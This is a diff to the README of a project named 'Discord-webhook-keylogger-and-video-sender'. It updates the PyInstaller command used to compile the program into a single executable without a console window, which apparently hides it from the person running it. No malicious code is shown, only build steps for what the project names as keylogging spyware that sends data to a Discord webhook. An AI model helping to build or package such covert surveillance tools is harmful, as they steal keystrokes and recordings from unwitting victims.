Quantam1921/Discord-webhook-keylogger-and-video-sender/README.md

 pip install pyinstaller

 Then run:
-pyinstaller --onefile --noconsole --add-binary "ffmpeg.exe;." main.py
+pyinstaller main.py --onefile --noconsole --collect-all imageio

 Usage Notes:
 The compiled executable will be located in a new /dist directory within your project folder.